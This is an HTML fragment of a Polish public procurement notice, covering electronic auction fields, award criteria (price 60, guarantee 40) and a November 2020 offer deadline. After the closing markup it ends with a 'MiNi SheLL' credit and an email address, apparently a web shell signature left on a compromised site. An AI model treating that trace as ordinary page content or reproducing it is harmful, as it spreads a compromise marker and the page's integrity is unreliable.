id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-11-16</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Zamówienie jest współfinansowane dotacją z budżetu państwa.Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki pochodzące z dotacji budżetu państwa, które Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostaną mu przyznane.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com